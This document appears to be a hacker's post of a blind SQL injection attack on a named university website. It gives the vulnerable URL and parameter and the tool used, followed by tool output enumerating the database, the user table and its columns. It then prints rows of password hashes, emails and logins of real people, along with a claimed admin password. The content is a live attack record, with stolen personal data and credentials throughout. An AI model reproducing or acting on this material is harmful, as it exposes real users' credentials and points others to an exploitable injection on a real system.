admin password = unesah
Problem: Where is the admin directory?
Website: http://www.unesa.ac.id
Bug: SQL injection
Tool: blindext.py
Dumps:
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 17:45:33
[+] Number of Rows: 1
[0]: webunesa
[-] 17:46:20
[-] Total URL Requests 80
[-] Done
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[17:46:30] StartTime
[+] Fuzzing Tables...
[Table]:user
[Column]:passwd
[Column]:id
[Column]:email
[Column]:login
[17:47:26] EndTime
[-] Total URL Requests 227
[-] Done
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "webunesa" Table "user"
[+] Column(s) ['passwd', 'id', 'email', 'login']
[+] 17:47:56
[+] Number of Rows: 15
[0]: a456cd1f2bb4665b380ad93060b977b1:111:soboparan@yahoo.com:ari
[1]: 4ea43e57d6f0054756af707ba44e85cc:111::pasca
[2]: 25eb39c0affd2939b4291d4141c4cb5b:111:alim_sumarno@yahoo.com:alim
I terminated here because it took a long time :). The admin is in the first row.